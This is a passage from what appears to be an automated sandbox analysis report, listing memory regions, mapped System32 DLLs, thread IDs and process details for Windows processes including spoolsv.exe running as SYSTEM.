0x7ffbfd810000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 14817 start_va = 0x7ffbfd9f0000 end_va = 0x7ffbfdaaffff entry_point = 0x7ffbfd9f0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 14818 start_va = 0x7ffbfdb00000 end_va = 0x7ffbfdb79fff entry_point = 0x7ffbfdb00000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 14819 start_va = 0x7ffbfdeb0000 end_va = 0x7ffbfdf14fff entry_point = 0x7ffbfdeb0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 14820 start_va = 0x7ffbfe0d0000 end_va = 0x7ffbfe0dafff entry_point = 0x7ffbfe0d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 14821 start_va = 0x7ffbfe0f0000 end_va = 0x7ffbfe127fff entry_point = 0x7ffbfe0f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 14822 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 14823 start_va = 0x7ffbff7c0000 end_va = 0x7ffbff7e2fff entry_point = 0x7ffbff7c0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 14824 start_va = 0x7ffbffaf0000 end_va = 0x7ffbffafbfff entry_point = 0x7ffbffaf0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 14825 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 14826 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 14827 start_va = 0x7ffbffeb0000 end_va = 0x7ffbffecefff entry_point = 0x7ffbffeb0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 14828 start_va = 0x7ffbfff10000 end_va = 0x7ffbfffb7fff entry_point = 0x7ffbfff10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 14829 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 14830 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 14831 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 14832 start_va = 0x7ffc00320000 end_va = 0x7ffc00340fff entry_point = 0x7ffc00320000 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 14833 start_va = 0x7ffc00370000 end_va = 0x7ffc003a5fff entry_point = 0x7ffc00370000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 14834 start_va = 0x7ffc003b0000 end_va = 0x7ffc003d5fff entry_point = 0x7ffc003b0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 14835 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 14836 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 14837 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 14838 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 14839 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 14840 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 14841 start_va = 0x7ffc00920000 end_va = 0x7ffc00930fff entry_point = 0x7ffc00920000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 14842 start_va = 0x7ffc00f70000 end_va = 0x7ffc00fb3fff entry_point = 0x7ffc00f70000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 14843 start_va = 0x7ffc01190000 end_va = 0x7ffc01350fff entry_point = 0x7ffc01190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 14844 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14845 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 14846 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14847 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 14848 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14849 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14850 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14851 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14852 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14853 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14854 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14855 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 14856 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14857 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1282 os_tid = 0xdfc Thread: id = 1283 os_tid = 0xdd0 Thread: id = 1284 os_tid = 0xd9c Thread: id = 1285 os_tid = 0x7c8 Thread: id = 1286 os_tid = 0x8fc Thread: id = 1287 os_tid = 0x668 Thread: id = 1288 os_tid = 0x660 Thread: id = 1289 os_tid = 0x658 Thread: id = 1290 os_tid = 0x654 Thread: id = 1291 os_tid = 0x638 Thread: id = 1292 os_tid = 0x600 Thread: id = 1293 os_tid = 0x5e8 Thread: id = 1294 os_tid = 0x5a4 Thread: id = 1295 os_tid = 0x59c Thread: id = 1296 os_tid = 0x490 Thread: id = 1297 os_tid = 0x47c Thread: id = 1298 os_tid = 0x464 Thread: id = 1299 os_tid = 0x444 Thread: id = 1300 os_tid = 0x440 Thread: id = 1301 os_tid = 0x43c Thread: id = 1302 os_tid = 0x3b8 Thread: id = 1303 os_tid = 0x39c Thread: id = 1304 os_tid = 0x280 Process: id = "288" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x52e41000" os_pid = "0x2a0" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:0001003b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 15697 start_va = 0xa90000 end_va = 0xa9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 15698 start_va = 0xaa0000 end_va = 0xaa6fff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 15699 start_va = 0xab0000 end_va = 0xac3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 15700 start_va = 0xad0000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 15701 start_va = 0xb10000 end_va = 0xb13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 15702 start_va = 0xb20000 end_va = 0xb20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 15703 start_va = 0xb30000 end_va = 0xb31fff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 15704 start_va = 0xb40000 end_va = 0xbfdfff entry_point = 0xb40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15705 start_va = 0xc00000 end_va = 0xc00fff entry_point = 0xc00000 region_type = mapped_file name = "spoolsv.exe.mui" filename = "\\Windows\\System32\\en-US\\spoolsv.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\spoolsv.exe.mui") Region: id = 15706 start_va = 0xc10000 end_va = 0xc10fff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 15707 start_va = 0xc20000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 15708 start_va = 0xd20000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 15709 start_va = 0xd60000 end_va = 0xee7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 15710 start_va = 0xef0000 end_va = 0x1070fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 15711 start_va = 0x1080000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001080000" filename = "" Region: id = 15712 start_va = 0x1140000 end_va = 0x1140fff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 15713 start_va = 0x1150000 end_va = 0x1156fff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 15714 start_va = 0x1160000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 15715 start_va = 0x11a0000 end_va = 0x11a0fff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 15716 start_va = 0x11b0000 end_va = 0x11bffff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 15717 start_va = 0x11c0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 15718 start_va = 0x1200000 end_va = 0x123ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 15719 start_va = 0x1240000 end_va = 0x127ffff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 15720 start_va = 0x12c0000 end_va = 0x12c6fff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 15721 start_va = 0x12d0000 end_va = 0x12e3fff entry_point = 0x12d0000 region_type = mapped_file name = "localspl.dll.mui" filename = "\\Windows\\System32\\en-US\\localspl.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\localspl.dll.mui") Region: id = 15722 start_va = 0x12f0000 end_va = 0x12f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012f0000" filename = "" Region: id = 15723 start_va = 0x1300000 end_va = 0x130ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 15724 start_va = 0x1310000 end_va = 0x1646fff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 15725 start_va = 0x1650000 end_va = 0x174ffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 15726 start_va = 0x1750000 end_va = 0x1750fff entry_point = 0x1750000 region_type = mapped_file name = "wsdmon.dll.mui" filename = "\\Windows\\System32\\en-US\\WSDMon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsdmon.dll.mui") Region: id = 15727 start_va = 0x1760000 end_va = 0x1760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001760000" filename = "" Region: id = 15728 start_va = 0x1770000 end_va = 0x1770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001770000" filename = "" Region: id = 15729 start_va = 0x1780000 end_va = 0x187ffff entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 15730 start_va = 0x1880000 end_va = 0x1880fff entry_point = 0x1880000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 15731 start_va = 0x1890000 end_va = 0x1896fff entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 15732 start_va = 0x18a0000 end_va = 0x18affff entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 15733 start_va = 0x18b0000 end_va = 0x198efff entry_point = 0x18b0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 15734 start_va = 0x1990000 end_va = 0x1a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 15735 start_va = 0x1a90000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 15736 start_va = 0x1c90000 end_va = 0x1ccffff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 15737 start_va = 0x1cd0000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 15738 start_va = 0x1d10000 end_va = 0x1d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 15739 start_va = 0x1d50000 end_va = 0x1d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 15740 start_va = 0x1d90000 end_va = 0x1dcffff entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 15741 start_va = 0x1e10000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 15742 start_va = 0x1e50000 end_va = 0x1e50fff entry_point = 0x1e50000 region_type = mapped_file name = "win32spl.dll.mui" filename = "\\Windows\\System32\\en-US\\win32spl.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\win32spl.dll.mui") Region: id = 15743 start_va = 0x1e60000 end_va = 0x1e60fff entry_point = 0x1e60000 region_type = mapped_file name = "inetpp.dll.mui" filename = "\\Windows\\System32\\en-US\\inetpp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inetpp.dll.mui") Region: id = 15744 start_va = 0x1e70000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 15745 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15746 start_va = 0x7df5ffee0000 end_va = 0x7ff5ffedffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffee0000" filename = "" Region: id = 15747 start_va = 0x7ff692ade000 end_va = 0x7ff692adffff entry_point = 0x0 region_type = private name = "private_0x00007ff692ade000" filename = "" Region: id = 15748 start_va = 0x7ff692ae0000 end_va = 0x7ff692ae1fff entry_point = 0x0 region_type = private name = "private_0x00007ff692ae0000" filename = "" Region: id = 15749 start_va = 0x7ff692ae4000 end_va = 0x7ff692ae5fff entry_point = 0x0 region_type = private name = "private_0x00007ff692ae4000" filename = "" Region: id = 15750 start_va = 0x7ff692ae6000 end_va = 0x7ff692ae7fff entry_point = 0x0 region_type = private name = "private_0x00007ff692ae6000" filename = "" Region: id = 15751 start_va = 0x7ff692ae8000 end_va = 0x7ff692ae9fff entry_point = 0x0 region_type = private name = "private_0x00007ff692ae8000" filename = "" Region: id = 15752 start_va = 0x7ff692aea000 end_va = 0x7ff692aebfff entry_point = 0x0 region_type = private name = "private_0x00007ff692aea000" filename = "" Region: id = 15753 start_va = 0x7ff692aec000 end_va = 0x7ff692aedfff entry_point = 0x0 region_type = private name = "private_0x00007ff692aec000" filename = "" Region: id = 15754 start_va = 0x7ff692af0000 end_va = 0x7ff692beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff692af0000" filename = "" Region: id = 15755 start_va = 0x7ff692bf0000 end_va = 0x7ff692c12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff692bf0000" filename = "" Region: id = 15756 start_va = 0x7ff692c13000 end_va = 0x7ff692c14fff entry_point = 0x0 region_type = private name = "private_0x00007ff692c13000" filename = "" Region: id = 15757 start_va = 0x7ff692c15000 end_va = 0x7ff692c16fff entry_point = 0x0 region_type = private name = "private_0x00007ff692c15000" filename = "" Region: id = 15758 start_va = 0x7ff692c17000 end_va = 0x7ff692c18fff entry_point = 0x0 region_type = private name = "private_0x00007ff692c17000" filename = "" Region: id = 15759 start_va = 0x7ff692c19000 end_va = 0x7ff692c1afff entry_point = 0x0 region_type = private name = "private_0x00007ff692c19000" filename = "" Region: id = 15760 start_va = 0x7ff692c1b000 end_va = 0x7ff692c1cfff entry_point = 0x0 region_type = private name = "private_0x00007ff692c1b000" filename = "" Region: id = 15761 start_va = 0x7ff692c1d000 end_va = 0x7ff692c1efff entry_point = 0x0 region_type = private name = "private_0x00007ff692c1d000" filename = "" Region: id = 15762 start_va = 0x7ff692c1f000 end_va = 0x7ff692c1ffff entry_point = 0x0 region_type = private name = "private_0x00007ff692c1f000" filename = "" Region: id = 15763 start_va = 0x7ff693800000 end_va = 0x7ff6938c4fff entry_point = 0x7ff693800000 region_type = mapped_file name = "spoolsv.exe" filename = "\\Windows\\System32\\spoolsv.exe" (normalized: "c:\\windows\\system32\\spoolsv.exe") Region: id = 15764 start_va = 0x7ffbeb470000 end_va = 0x7ffbeb541fff entry_point = 0x7ffbeb470000 region_type = mapped_file name = "win32spl.dll" filename = "\\Windows\\System32\\win32spl.dll" (normalized: "c:\\windows\\system32\\win32spl.dll") Region: id = 15765 start_va = 0x7ffbeb550000 end_va = 0x7ffbeb622fff entry_point = 0x7ffbeb550000 region_type = mapped_file name = "drvstore.dll" filename = "\\Windows\\System32\\drvstore.dll" (normalized: "c:\\windows\\system32\\drvstore.dll") Region: id = 15766 start_va = 0x7ffbeb630000 end_va = 0x7ffbeb7aafff entry_point = 0x7ffbeb630000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 15767 start_va = 0x7ffbebb60000 end_va = 0x7ffbebc06fff entry_point = 0x7ffbebb60000 region_type = mapped_file name = "wsdapi.dll" filename = "\\Windows\\System32\\WSDApi.dll" (normalized: "c:\\windows\\system32\\wsdapi.dll") Region: id = 15768 start_va = 0x7ffbebc10000 end_va = 0x7ffbebca3fff entry_point = 0x7ffbebc10000 region_type = mapped_file name = "wsdmon.dll" filename = "\\Windows\\System32\\WSDMon.dll" (normalized: "c:\\windows\\system32\\wsdmon.dll") Region: id = 15769 start_va = 0x7ffbebd80000 end_va = 0x7ffbebdadfff entry_point = 0x7ffbebd80000 region_type = mapped_file name = "inetpp.dll" filename = "\\Windows\\System32\\inetpp.dll" (normalized: "c:\\windows\\system32\\inetpp.dll") Region: id = 15770 start_va = 0x7ffbecf50000 end_va = 0x7ffbecf5ffff entry_point = 0x7ffbecf50000 region_type = mapped_file name = "winprint.dll" filename = "\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll" (normalized: "c:\\windows\\system32\\spool\\prtprocs\\x64\\winprint.dll") Region: id = 15771 start_va = 0x7ffbecf60000 end_va = 0x7ffbecf72fff entry_point = 0x7ffbecf60000 region_type = mapped_file name = "fdpnp.dll" filename = "\\Windows\\System32\\fdPnp.dll" (normalized: "c:\\windows\\system32\\fdpnp.dll") Region: id = 15772 start_va = 0x7ffbecf80000 end_va = 0x7ffbecfa9fff entry_point = 0x7ffbecf80000 region_type = mapped_file name = "fundisc.dll" filename = "\\Windows\\System32\\fundisc.dll" (normalized: "c:\\windows\\system32\\fundisc.dll") Region: id = 15773 start_va = 0x7ffbed160000 end_va = 0x7ffbed1aefff entry_point = 0x7ffbed160000 region_type = mapped_file name = "usbmon.dll" filename = "\\Windows\\System32\\usbmon.dll" (normalized: "c:\\windows\\system32\\usbmon.dll") Region: id = 15774 start_va = 0x7ffbed1b0000 end_va = 0x7ffbed1c3fff entry_point = 0x7ffbed1b0000 region_type = mapped_file name = "wsnmp32.dll" filename = "\\Windows\\System32\\wsnmp32.dll" (normalized: "c:\\windows\\system32\\wsnmp32.dll") Region: id = 15775 start_va = 0x7ffbed1d0000 end_va = 0x7ffbed209fff entry_point = 0x7ffbed1d0000 region_type = mapped_file name = "tcpmon.dll" filename = "\\Windows\\System32\\tcpmon.dll" (normalized: "c:\\windows\\system32\\tcpmon.dll") Region: id = 15776 start_va = 0x7ffbed210000 end_va = 0x7ffbed220fff entry_point = 0x7ffbed210000 region_type = mapped_file name = "fxsmon.dll" filename = "\\Windows\\System32\\FXSMON.dll" (normalized: "c:\\windows\\system32\\fxsmon.dll") Region: id = 15777 start_va = 0x7ffbed230000 end_va = 0x7ffbed243fff entry_point = 0x7ffbed230000 region_type = mapped_file name = "printisolationproxy.dll" filename = "\\Windows\\System32\\PrintIsolationProxy.dll" (normalized: "c:\\windows\\system32\\printisolationproxy.dll") Region: id = 15778 start_va = 0x7ffbed250000 end_va = 0x7ffbed260fff entry_point = 0x7ffbed250000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 15779 start_va = 0x7ffbed270000 end_va = 0x7ffbed385fff entry_point = 0x7ffbed270000 region_type = mapped_file name = "localspl.dll" filename = "\\Windows\\System32\\localspl.dll" (normalized: "c:\\windows\\system32\\localspl.dll") Region: id = 15780 start_va = 0x7ffbefdf0000 end_va = 0x7ffbefe73fff entry_point = 0x7ffbefdf0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 15781 start_va = 0x7ffbf08d0000 end_va = 0x7ffbf08dffff entry_point = 0x7ffbf08d0000 region_type = mapped_file name = "deviceassociation.dll" filename = "\\Windows\\System32\\deviceassociation.dll" (normalized: "c:\\windows\\system32\\deviceassociation.dll") Region: id = 15782 start_va = 0x7ffbf2120000 end_va = 0x7ffbf2396fff entry_point = 0x7ffbf2120000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 15783 start_va = 0x7ffbf2bd0000 end_va = 0x7ffbf2bdbfff entry_point = 0x7ffbf2bd0000 region_type = mapped_file name = "snmpapi.dll" filename = "\\Windows\\System32\\snmpapi.dll" (normalized: "c:\\windows\\system32\\snmpapi.dll") Region: id = 15784 start_va = 0x7ffbf69c0000 end_va = 0x7ffbf69dbfff entry_point = 0x7ffbf69c0000 region_type = mapped_file name = "spoolss.dll" filename = "\\Windows\\System32\\spoolss.dll" (normalized: "c:\\windows\\system32\\spoolss.dll") Region: id = 15785 start_va = 0x7ffbf6f50000 end_va = 0x7ffbf6f61fff entry_point = 0x7ffbf6f50000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 15786 start_va = 0x7ffbf9f50000 end_va = 0x7ffbf9f59fff entry_point = 0x7ffbf9f50000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 15787 start_va = 0x7ffbfb2b0000 end_va = 0x7ffbfb2bbfff entry_point = 0x7ffbfb2b0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 15788 start_va = 0x7ffbfbb40000 end_va = 0x7ffbfbc15fff entry_point = 0x7ffbfbb40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 15789 start_va = 0x7ffbfbe40000 end_va = 0x7ffbfbe75fff entry_point = 0x7ffbfbe40000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") 